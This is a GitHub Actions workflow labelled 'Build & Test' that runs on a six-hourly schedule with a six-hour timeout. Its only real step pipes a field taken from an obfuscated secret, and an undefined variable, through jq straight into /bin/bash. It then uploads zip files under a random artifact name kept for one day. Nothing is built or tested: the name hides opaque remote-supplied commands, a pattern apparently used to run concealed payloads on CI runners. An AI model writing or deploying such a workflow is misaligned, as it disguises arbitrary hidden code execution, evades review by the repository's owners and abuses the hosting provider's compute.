name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '25 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          wx33460: ${{ secrets.wx33460 }}
        run: |
          printf '%s' "$wx33460" | jq -r .jmhiv240 | /bin/bash
          echo $pq2 | jq -r .nasam55100 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: t1HxSs0W
          path: "*.zip"
          retention-days: 1
